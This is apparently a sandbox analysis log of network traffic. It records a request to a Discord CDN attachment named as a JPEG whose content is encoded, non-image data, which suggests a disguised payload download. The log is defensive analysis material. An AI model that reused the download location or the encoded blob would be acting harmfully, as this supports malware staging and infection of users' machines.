                                                                                                2021-10-26 15:35:12 UTC4255INData Raw: 54 50 69 20 4d 4d 70 20 54 55 55 20 54 50 54 20 4d 4d 70 20 54 55 4f 20 54 67 50 20 4d 4d 70 20 54 55 55 20 54 50 53 20 4d 4d 70 20 54 55 55 20 54 50 67 20 4d 4d 70 20 54 55 4f 20 54 69 69 20 4d 4d 70 20 54 55 4f 20 54 70 53 20 4d 4d 70 20 54 55 4f 20 54 50 55 20 4d 4d 70 20 54 55 55 20 54 55 54 20 4d 4d 70 20 54 55 55 20 54 50 54 20 4d 4d 70 20 54 55 55 20 54 50 70 20 53 20 4d 67 50 20 54 67 4d 20 54 4d 55 20 4d 67 50 20 54 67 4d 20 54 69 67 20 4d 67 50 20 54 67 67 20 54 67 67 20 4d 67 50 20 54 67 4d 20 54 70 69 20 4d 67 50 20 54 67 4d 20 54 6e 4d 20 4d 67 50 20 54 67 4d 20 54 6e 4f 20 4d 67 50 20 54 67 4d 20 54 4d 4f 20 4d 67 50 20 54 67 54 20 54 55 6e 20 4d 67 50 20 54 67 4d 20 54 67 53 20 4d 67 50 20 54 67 54 20 54 55 4f 20 4d 67 50 20 54 67 4d 20 54
                                                                                                Data Ascii: TPi MMp TUU TPT MMp TUO TgP MMp TUU TPS MMp TUU TPg MMp TUO Tii MMp TUO TpS MMp TUO TPU MMp TUU TUT MMp TUU TPT MMp TUU TPp S MgP TgM TMU MgP TgM Tig MgP Tgg Tgg MgP TgM Tpi MgP TgM TnM MgP TgM TnO MgP TgM TMO MgP TgT TUn MgP TgM TgS MgP TgT TUO MgP TgM T
                                                                                                2021-10-26 15:35:12 UTC4271INData Raw: 53 20 4d 67 4d 20 54 70 54 20 54 67 4d 20 4d 67 4d 20 54 70 53 20 54 4f 53 20 4d 67 4d 20 54 70 54 20 54 6e 55 20 4d 67 4d 20 54 70 54 20 54 67 4d 20 4d 67 4d 20 54 70 54 20 54 6e 70 20 4d 67 4d 20 54 70 4d 20 54 67 67 20 4d 67 4d 20 54 70 54 20 54 4d 4f 20 4d 67 4d 20 54 70 54 20 54 6e 50 20 4d 67 4d 20 54 70 54 20 54 67 67 20 4d 67 4d 20 54 70 54 20 54 6e 6e 20 4d 67 4d 20 54 70 54 20 54 69 50 20 4d 67 4d 20 54 70 54 20 54 67 54 20 4d 67 4d 20 54 70 54 20 54 6e 69 20 4d 67 4d 20 54 70 53 20 54 55 4f 20 4d 67 4d 20 54 70 54 20 54 70 67 20 53 20 4d 4d 50 20 54 70 50 20 54 55 70 20 4d 4d 50 20 54 70 70 20 54 67 53 20 4d 4d 50 20 54 70 50 20 54 70 53 20 4d 4d 50 20 54 70 50 20 54 50 4f 20 4d 4d 50 20 54 70 70 20 54 4d 4f 20 4d 4d 50 20 54 70 70 20 54 70 67
                                                                                                Data Ascii: S MgM TpT TgM MgM TpS TOS MgM TpT TnU MgM TpT TgM MgM TpT Tnp MgM TpM Tgg MgM TpT TMO MgM TpT TnP MgM TpT Tgg MgM TpT Tnn MgM TpT TiP MgM TpT TgT MgM TpT Tni MgM TpS TUO MgM TpT Tpg S MMP TpP TUp MMP Tpp TgS MMP TpP TpS MMP TpP TPO MMP Tpp TMO MMP Tpp Tpg
                                                                                                2021-10-26 15:35:12 UTC4287INData Raw: 67 20 54 55 69 20 54 70 4f 20 4d 67 67 20 54 55 67 20 54 55 67 20 4d 67 67 20 54 55 67 20 54 55 4d 20 4d 67 67 20 54 55 67 20 54 6e 4f 20 4d 67 67 20 54 55 67 20 54 55 70 20 4d 67 67 20 54 55 67 20 54 55 69 20 4d 67 67 20 54 55 69 20 54 69 6e 20 4d 67 67 20 54 55 67 20 54 55 6e 20 4d 67 67 20 54 55 69 20 54 67 50 20 4d 67 67 20 54 55 67 20 54 55 69 20 4d 67 67 20 54 55 69 20 54 70 6e 20 4d 67 67 20 54 55 67 20 54 6e 4f 20 4d 67 67 20 54 55 67 20 54 55 70 20 4d 67 67 20 54 55 69 20 54 50 6e 20 4d 67 67 20 54 55 69 20 54 70 4f 20 53 20 4d 4d 55 20 54 55 70 20 54 69 50 20 4d 4d 55 20 54 55 50 20 54 55 55 20 4d 4d 55 20 54 55 50 20 54 55 67 20 4d 4d 55 20 54 55 50 20 54 55 67 20 4d 4d 55 20 54 55 70 20 54 50 4f 20 4d 4d 55 20 54 55 70 20 54 69 4f 20 4d 4d 55
                                                                                                Data Ascii: g TUi TpO Mgg TUg TUg Mgg TUg TUM Mgg TUg TnO Mgg TUg TUp Mgg TUg TUi Mgg TUi Tin Mgg TUg TUn Mgg TUi TgP Mgg TUg TUi Mgg TUi Tpn Mgg TUg TnO Mgg TUg TUp Mgg TUi TPn Mgg TUi TpO S MMU TUp TiP MMU TUP TUU MMU TUP TUg MMU TUP TUg MMU TUp TPO MMU TUp TiO MMU
                                                                                                2021-10-26 15:35:12 UTC4303INData Raw: 4f 20 54 4f 53 20 4d 4d 55 20 54 55 53 20 54 69 70 20 4d 4d 55 20 54 55 53 20 54 67 67 20 4d 4d 55 20 54 55 53 20 54 6e 70 20 4d 4d 55 20 54 55 53 20 54 50 50 20 4d 4d 55 20 54 55 53 20 54 55 53 20 4d 4d 55 20 54 55 53 20 54 4d 4f 20 4d 4d 55 20 54 55 53 20 54 67 69 20 4d 4d 55 20 54 55 54 20 54 4d 4f 20 4d 4d 55 20 54 55 53 20 54 6e 6e 20 53 20 4d 67 4d 20 54 55 54 20 54 69 50 20 4d 67 4d 20 54 55 53 20 54 55 53 20 4d 67 4d 20 54 55 53 20 54 55 67 20 4d 67 4d 20 54 55 53 20 54 55 54 20 4d 67 4d 20 54 55 54 20 54 69 53 20 4d 67 4d 20 54 55 54 20 54 6e 6e 20 4d 67 4d 20 54 55 53 20 54 6e 6e 20 4d 67 4d 20 54 55 53 20 54 55 54 20 4d 67 4d 20 54 55 53 20 54 6e 4f 20 4d 67 4d 20 54 55 53 20 54 55 67 20 4d 67 4d 20 54 55 53 20 54 55 53 20 4d 67 4d 20 54 55 54
                                                                                                Data Ascii: O TOS MMU TUS Tip MMU TUS Tgg MMU TUS Tnp MMU TUS TPP MMU TUS TUS MMU TUS TMO MMU TUS Tgi MMU TUT TMO MMU TUS Tnn S MgM TUT TiP MgM TUS TUS MgM TUS TUg MgM TUS TUT MgM TUT TiS MgM TUT Tnn MgM TUS Tnn MgM TUS TUT MgM TUS TnO MgM TUS TUg MgM TUS TUS MgM TUT
                                                                                                2021-10-26 15:35:12 UTC4319INData Raw: 4d 20 4d 4d 55 20 54 4d 4f 20 54 6e 53 20 4d 4d 55 20 54 4d 55 20 54 55 54 20 4d 4d 55 20 54 4d 55 20 54 55 69 20 4d 4d 55 20 54 4d 55 20 54 55 67 20 4d 4d 55 20 54 4d 4f 20 54 6e 54 20 4d 4d 55 20 54 4d 4f 20 54 55 50 20 4d 4d 55 20 54 4d 4f 20 54 6e 53 20 4d 4d 55 20 54 4d 55 20 54 55 55 20 4d 4d 55 20 54 4d 55 20 54 55 69 20 53 20 4d 67 55 20 54 67 69 20 54 55 69 20 4d 67 55 20 54 67 50 20 54 67 53 20 4d 67 55 20 54 67 50 20 54 4d 55 20 4d 67 55 20 54 67 50 20 54 67 6e 20 4d 67 55 20 54 67 69 20 54 70 6e 20 4d 67 55 20 54 67 50 20 54 69 67 20 4d 67 55 20 54 67 69 20 54 69 4d 20 4d 67 55 20 54 67 50 20 54 69 67 20 4d 67 55 20 54 67 69 20 54 70 53 20 4d 67 55 20 54 67 69 20 54 69 4d 20 4d 67 55 20 54 67 50 20 54 69 55 20 4d 67 55 20 54 67 69 20 54 4f 54
                                                                                                Data Ascii: M MMU TMO TnS MMU TMU TUT MMU TMU TUi MMU TMU TUg MMU TMO TnT MMU TMO TUP MMU TMO TnS MMU TMU TUU MMU TMU TUi S MgU Tgi TUi MgU TgP TgS MgU TgP TMU MgU TgP Tgn MgU Tgi Tpn MgU TgP Tig MgU Tgi TiM MgU TgP Tig MgU Tgi TpS MgU Tgi TiM MgU TgP TiU MgU Tgi TOT
                                                                                                2021-10-26 15:35:12 UTC4335INData Raw: 6e 20 54 50 4d 20 4d 67 6e 20 54 50 6e 20 54 6e 69 20 4d 67 6e 20 54 50 70 20 54 6e 67 20 4d 67 6e 20 54 50 70 20 54 70 70 20 4d 67 6e 20 54 50 6e 20 54 70 69 20 4d 67 6e 20 54 50 6e 20 54 50 69 20 4d 67 6e 20 54 50 70 20 54 70 50 20 4d 67 6e 20 54 50 6e 20 54 6e 50 20 4d 67 6e 20 54 50 70 20 54 70 6e 20 4d 67 6e 20 54 50 6e 20 54 50 70 20 4d 67 6e 20 54 50 70 20 54 70 6e 20 4d 67 6e 20 54 50 70 20 54 55 6e 20 4d 67 6e 20 54 50 70 20 54 4f 54 20 53 20 4d 67 4d 20 54 70 54 20 54 70 54 20 4d 67 4d 20 54 70 53 20 54 70 54 20 4d 67 4d 20 54 70 53 20 54 50 55 20 4d 67 4d 20 54 70 53 20 54 50 50 20 4d 67 4d 20 54 70 54 20 54 69 54 20 4d 67 4d 20 54 70 53 20 54 70 67 20 4d 67 4d 20 54 70 54 20 54 67 4d 20 4d 67 4d 20 54 70 54 20 54 69 50 20 4d 67 4d 20 54 70 53
                                                                                                Data Ascii: n TPM Mgn TPn Tni Mgn TPp Tng Mgn TPp Tpp Mgn TPn Tpi Mgn TPn TPi Mgn TPp TpP Mgn TPn TnP Mgn TPp Tpn Mgn TPn TPp Mgn TPp Tpn Mgn TPp TUn Mgn TPp TOT S MgM TpT TpT MgM TpS TpT MgM TpS TPU MgM TpS TPP MgM TpT TiT MgM TpS Tpg MgM TpT TgM MgM TpT TiP MgM TpS
                                                                                                2021-10-26 15:35:12 UTC4351INData Raw: 54 20 53 20 69 67 20 53 20 54 53 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 69 20 53 20 54 53 4d 20 53 20 50 6e 20 53 20 69 55 20 53 20 6e 67 20 53 20 69 67 20 53 20 54 54 50 20 53 20 55 50 20 53 20 4f 53 20 53 20 54 54 54 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 55 53 20 53 20 55 55 20 53 20 55 54 20 53 20 6e 50 20 53 20 54 53 50 20 53 20 69 55 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 6e 53 20 53 20 54 53 4d 20 53 20 54 54 54 20 53 20 6e 53 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 69 4f 20 53 20 50 70 20 53 20 54 53 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 55 20 53 20 50 69 20 53 20 70 55 20 53 20 55 6e 20 53 20 54 53 53 20 53 20 70 50 20 53
                                                                                                Data Ascii: T S ig S TSg S pO S UT S pP S pP S pP S TSi S TSM S Pn S iU S ng S ig S TTP S UP S OS S TTT S nn S in S US S UU S UT S nP S TSP S iU S UT S TSn S pO S nS S TSM S TTT S nS S pO S pP S pP S pP S ng S iO S Pp S TSS S TTO S ni S UU S Pi S pU S Un S TSS S pP S


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                5192.168.2.549755162.159.135.233443
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-26 15:35:13 UTC4361OUTGET /attachments/893177342426509335/902539097346814013/779A1864.jpg HTTP/1.1
                                                                                                Host: cdn.discordapp.com
                                                                                                2021-10-26 15:35:13 UTC4361INHTTP/1.1 200 OK
                                                                                                Date: Tue, 26 Oct 2021 15:35:13 GMT
                                                                                                Content-Type: image/jpeg
                                                                                                Content-Length: 693967
                                                                                                Connection: close
                                                                                                CF-Ray: 6a44c0d38c545bf1-FRA
                                                                                                Accept-Ranges: bytes
                                                                                                Age: 2119
                                                                                                Cache-Control: public, max-age=31536000
                                                                                                ETag: "23a5250b8d90156e7d3cdf648d28e9da"
                                                                                                Expires: Wed, 26 Oct 2022 15:35:13 GMT
                                                                                                Last-Modified: Tue, 26 Oct 2021 12:48:09 GMT
                                                                                                Vary: Accept-Encoding
                                                                                                CF-Cache-Status: HIT
                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                Cf-Bgj: h2pri
                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                x-goog-generation: 1635252489262793
                                                                                                x-goog-hash: crc32c=la2Ogw==
                                                                                                x-goog-hash: md5=I6UlC42QFW59PN9kjSjp2g==
                                                                                                x-goog-metageneration: 1
                                                                                                x-goog-storage-class: STANDARD
                                                                                                x-goog-stored-content-encoding: identity
                                                                                                x-goog-stored-content-length: 693967
                                                                                                X-GUploader-UploadID: ADPycdugciGjaBfm1jkRHrCGp6TL-hiSTfEGgfhLw1xDKH1ZiuRprzVhtotiFAMhjRQuGamJ9-8cZedzcbOg46e7pu4
                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mM4bLnh0Mlom6wSk4JeNvOsDfW%2ByoMEFXltoqbU%2FE3Wf7Eifoxzmp78Yi74bSQGhtYzaQN1T2OBzZzOD7GOC9MwYHU9025eB%2Fh4BPn7eV5IK4izZiCiTUJ8%2FjVO99dmr9GhsnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                2021-10-26 15:35:13 UTC4362INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                2021-10-26 15:35:13 UTC4362INData Raw: 53 20 55 55 20 53 20 55 55 20 53 20 4f 4f 20 53 20 50 69 20 53 20 6e 6e 20 53 20 70 55 20 53 20 50 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 6e 55 20 53 20 54 53 53 20 53 20 54 53 53 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 54 53 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 50 67 20 53 20 4f 55 20 53 20 54 4d 54 20 53 20 4f 4f 20 53 20 6e 67 20 53 20 70 4f 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 6e 70 20 53 20 50 70 20 53 20 6e 67 20 53 20 6e 4d 20 53 20 6e 54 20 53 20 50 4d 20 53 20 6e 53 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 55 20 53 20 54 54 50 20
                                                                                                Data Ascii: S UU S UU S OO S Pi S nn S pU S Pg S in S in S ig S nU S TSS S TSS S TMM S TTT S TSn S pU S TTT S pP S pP S nS S Pg S OU S TMT S OO S ng S pO S pP S nS S On S np S Pp S ng S nM S nT S PM S nS S UT S pP S pP S nO S TSP S UP S nO S TTO S pP S pP S UU S TTP
                                                                                                2021-10-26 15:35:13 UTC4363INData Raw: 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 50 20 53 20 6e 6e 20 53 20 50 6e 20 53 20 54 54 70 20 53 20 55 69 20 53 20 4f 6e 20 53 20 54 53 69 20 53 20 70 55 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 55 20 53 20 70 55 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 50 50 20 53 20 54 54 4f 20 53 20 50 4d 20 53 20 54 53 55 20 53 20 6e 53 20 53 20 6e 53 20 53 20 70 50 20 53 20 69 67 20 53 20 70 4f 20 53 20 6e 67 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 69 4f 20 53 20 50 70 20 53 20 6e 50 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 67 20 53 20 54 53 67 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 70 20 53
                                                                                                Data Ascii: S in S PT S UP S UP S nn S Pn S TTp S Ui S On S TSi S pU S in S nS S OU S pU S pP S UT S pP S pP S PP S TTO S PM S TSU S nS S nS S pP S ig S pO S ng S TTO S pO S pP S pP S ng S PS S iO S Pp S nP S TSp S in S in S ig S TSg S TSP S in S US S in S in S TSp S
                                                                                                2021-10-26 15:35:13 UTC4365INData Raw: 53 70 20 53 20 54 53 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 70 20 53 20 69 4f 20 53 20 69 67 20 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 54 6e 20 53 20 6e 4f 20 53 20 54 53 70 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 70 20 53 20 69 55 20 53 20 70 50 20 53 20 54 54 54 20 53 20 54 54 55 20 53 20 6e 54 20 53 20 54 53 70 20 53 20 55 50 20 53 20 50 54 20 53 20 50 70 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 55 53 20 53 20 54 54 4f 20 53 20 6e 69 20 53 20 55 4d 20 53 20 55 50 20 53 20 55 53
                                                                                                Data Ascii: Sp S TSn S pP S pP S ng S TTp S iO S ig S pU S TTU S TMM S TTn S nO S TSp S pO S UT S pP S pp S iU S pP S TTT S TTU S nT S TSp S UP S PT S Pp S UP S UO S iO S nn S US S TTO S ni S UM S UP S US
                                                                                                2021-10-26 15:35:13 UTC4365INData Raw: 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 6e 53 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 70 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 55 20 53 20 54 54 55 20 53 20 54 4d 4d 20 53 20 54 53 53 20 53 20 55 54 20 53 20 55 6e 20 53 20 69 67 20 53 20 50 69 20 53 20 6e 6e 20 53 20 55 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 70 55 20 53 20 54 4d 54 20 53 20 55 53 20 53 20 69 67 20 53 20 6e 55 20 53 20 54 54 55 20 53 20 54 53 53 20 53 20 70 55 20 53 20 50 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 54 54 20 53 20 6e 4d 20 53 20 55 69 20 53 20 54 54 54 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 50 53 20
                                                                                                Data Ascii: S Pn S iO S pO S US S Pn S iO S nS S US S Pp S Up S TTp S nn S pp S pP S pP S pU S TTU S TMM S TSS S UT S Un S ig S Pi S nn S UM S pP S pP S nS S On S pU S TMT S US S ig S nU S TTU S TSS S pU S Pn S in S in S in S TTT S nM S Ui S TTT S pP S pP S ng S PS
                                                                                                2021-10-26 15:35:13 UTC4366INData Raw: 20 69 4f 20 53 20 70 6e 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 54 54 55 20 53 20 55 53 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 53 20 53 20 54 53 50 20 53 20 54 53 6e 20 53 20 54 4d 54 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 4f 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 50 69 20 53 20 6e 53 20 53 20 54 53 50 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 70 20 53 20 54 54 67 20 53 20 6e 4f 20 53 20 6e 67 20 53 20 69 4f 20 53 20 6e 53 20 53 20 54 4d 53 20 53 20 6e 53 20 53 20 4f 53 20 53 20 55 54 20 53 20 50 69 20 53 20 6e 4d 20 53 20 70 6e 20 53 20 55 70 20 53 20 70 50 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 55 20 53 20 54 53
                                                                                                Data Ascii: iO S pn S ng S PS S nS S TTU S US S PT S in S in S PS S TSP S TSn S TMT S pO S pP S pP S On S US S Pp S pP S pP S pP S pp S UT S Pi S nS S TSP S Up S pP S pP S pp S TTg S nO S ng S iO S nS S TMS S nS S OS S UT S Pi S nM S pn S Up S pP S pP S pn S nU S TS
                                                                                                2021-10-26 15:35:13 UTC4368INData Raw: 50 20 53 20 55 4f 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 54 67 20 53 20 70 4f 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 55 20 53 20 55 6e 20 53 20 55 70 20 53 20 50 54 20 53 20 55 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 54 20 53 20 54 53 6e 20 53 20 70 4f 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 70 50 20 53 20 70 70 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 70 55 20 53 20 54 54 54 20 53 20 55 50 20 53 20 54 4d 54 20 53 20 50 4d 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 6e 55 20 53 20 50 4d 20 53 20 70 70 20 53 20 70 50 20 53 20 55 70 20 53 20 50 53 20 53 20 6e 6e 20 53 20 6e 67 20 53 20 6e 4f 20 53 20 69 6e 20 53 20 54 54 67 20 53 20 70 4f 20 53
                                                                                                Data Ascii: P S UO S nO S in S TTg S pO S UT S pP S pP S pP S nU S Un S Up S PT S UT S in S in S PT S UT S TSn S pO S nO S TSP S pP S pp S UT S pP S pP S TSP S in S pU S TTT S UP S TMT S PM S pP S pP S ng S nU S PM S pp S pP S Up S PS S nn S ng S nO S in S TTg S pO S
                                                                                                2021-10-26 15:35:13 UTC4369INData Raw: 20 53 20 54 54 54 20 53 20 54 54 54 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 70 55 20 53 20 54 54 54 20 53 20 50 50 20 53 20 55 55 20 53 20 4f 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 6e 67 20 53 20 69 4f 20 53 20 54 53 53 20 53 20 54 4d 53 20 53 20 6e 4f 20 53 20 54 53 69 20 53 20 54 53 53 20 53 20 54 53 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 69 20 53 20 4f 4f 20 53 20 70 70 20 53 20 69 55 20 53 20 6e 67 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 70 4f 20 53 20 55 53 20 53 20 50 70 20 53 20 54 54 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 67 20 53 20 50 69 20 53 20 70 70 20 53 20 54 53 67 20 53 20
                                                                                                Data Ascii: S TTT S TTT S UU S OO S pP S pP S nS S pU S TTT S PP S UU S OO S pP S pP S US S Pn S iO S pU S ng S iO S TSS S TMS S nO S TSi S TSS S TST S TTO S pP S pP S TSi S OO S pp S iU S ng S US S Pn S iO S pO S US S Pp S TTO S in S PT S UP S ng S Pi S pp S TSg S
                                                                                                2021-10-26 15:35:13 UTC4370INData Raw: 20 53 20 54 53 6e 20 53 20 70 70 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 55 53 20 53 20 54 54 69 20 53 20 70 6e 20 53 20 55 53 20 53 20 50 70 20 53 20 55 70 20 53 20 54 54 67 20 53 20 6e 6e 20 53 20 70 70 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 67 20 53 20 54 54 55 20 53 20 54 54 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 6e 6e 20 53 20 69 6e 20 53 20 54 4d 53 20 53 20 55 6e 20 53 20 55 50 20 53 20 54 54 4f 20 53 20 70 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 70 20 53 20 69 6e 20 53 20 6e 53 20 53 20 4f 6e 20 53 20 54 53 70 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 6e 20 53 20 6e 70 20 53 20 50 70 20 53 20 55 53 20 53 20 50 6e 20 53 20 69 4f 20 53 20 69 67 20 53 20 55 53 20 53 20 50
                                                                                                Data Ascii: S TSn S pp S TSP S in S US S TTi S pn S US S Pp S Up S TTg S nn S pp S pP S pP S ng S TTU S TTO S in S PT S UP S nn S in S TMS S Un S UP S TTO S pO S pP S pP S Pi S TTO S TSp S in S nS S On S TSp S pP S UT S pP S pn S np S Pp S US S Pn S iO S ig S US S P
                                                                                                2021-10-26 15:35:13 UTC4372INData Raw: 70 20 53 20 54 4d 54 20 53 20 54 54 4f 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 53 20 53 20 54 53 55 20 53 20 4f 53 20 53 20 50 69 20 53 20 54 54 4f 20 53 20 54 53 53 20 53 20 54 53 4f 20 53 20 54 53 50 20 53 20 4f 55 20 53 20 50 54 20 53 20 55 4f 20 53 20 69 67 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 55 20 53 20 50 70 20 53 20 55 50 20 53 20 6e 67 20 53 20 50 53 20 53 20 6e 53 20 53 20 50 53 20 53 20 55 53 20 53 20 54 54 55 20 53 20 69 6e 20 53 20 69 6e 20 53 20 69 4f 20 53 20 70 55 20 53 20 69 6e 20 53 20 54 53 53 20 53 20 55 54 20 53 20 54 53 50 20 53 20 6e 69 20 53 20 54 53 4d 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 55 67 20 53 20 69 6e 20 53 20 50 50 20 53 20 69 6e 20 53 20 69
                                                                                                Data Ascii: p S TMT S TTO S pP S pP S nS S TSU S OS S Pi S TTO S TSS S TSO S TSP S OU S PT S UO S ig S in S in S in S TSp S UP S UU S Pp S UP S ng S PS S nS S PS S US S TTU S in S in S iO S pU S in S TSS S UT S TSP S ni S TSM S TSM S TMM S TTT S Ug S in S PP S in S i
                                                                                                2021-10-26 15:35:13 UTC4373INData Raw: 20 54 53 6e 20 53 20 69 4f 20 53 20 6e 6e 20 53 20 54 53 69 20 53 20 70 50 20 53 20 70 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 69 4f 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 50 20 53 20 69 6e 20 53 20 54 53 69 20 53 20 4f 53 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 55 20 53 20 54 53 67 20 53 20 69 6e 20 53 20 54 53 4d 20 53 20 69 6e 20 53 20 69 6e 20 53 20 55 50 20 53 20 6e 4f 20 53 20 54 53 50 20 53 20 54 53 4f 20 53 20 54 53 6e 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 54 53 70 20 53 20 55 50 20 53 20 55 54 20 53 20 6e 4d 20 53 20 70 50 20 53 20 55 69 20 53 20 69 55 20 53 20 70 4f 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 55 6e 20 53 20 55 55 20 53 20 6e 6e 20 53 20 4f
                                                                                                Data Ascii: TSn S iO S nn S TSi S pP S pP S nO S TSP S iO S TSn S UT S pP S pP S TSP S in S TSi S OS S TSp S UO S UU S TSg S in S TSM S in S in S UP S nO S TSP S TSO S TSn S UT S pP S pP S TSp S UP S UT S nM S pP S Ui S iU S pO S pP S UT S pP S pP S Un S UU S nn S O
                                                                                                2021-10-26 15:35:13 UTC4374INData Raw: 53 20 53 20 4f 6e 20 53 20 6e 69 20 53 20 55 55 20 53 20 54 53 4d 20 53 20 54 4d 4d 20 53 20 54 54 54 20 53 20 6e 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 69 6e 20 53 20 69 6e 20 53 20 54 4d 4d 20 53 20 54 54 55 20 53 20 70 55 20 53 20 54 53 50 20 53 20 55 50 20 53 20 55 55 20 53 20 50 4d 20 53 20 70 55 20 53 20 50 4d 20 53 20 55 6e 20 53 20 54 54 53 20 53 20 70 50 20 53 20 55 54 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 54 53 67 20 53 20 54 53 70 20 53 20 55 4f 20 53 20 55 4f 20 53 20 70 50 20 53 20 70 6e 20 53 20 70 50 20 53 20 70 50 20 53 20 70 50 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 4f 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50 20 53 20 55 4f 20 53 20 69 6e 20 53 20 50 54 20 53 20 55 50
                                                                                                Data Ascii: S S On S ni S UU S TSM S TMM S TTT S nP S in S PT S in S in S TMM S TTU S pU S TSP S UP S UU S PM S pU S PM S Un S TTS S pP S UT S pP S pP S in S PT S UP S TSg S TSp S UO S UO S pP S pn S pP S pP S pP S in S PT S UP S OO S in S PT S UP S UO S in S PT S UP
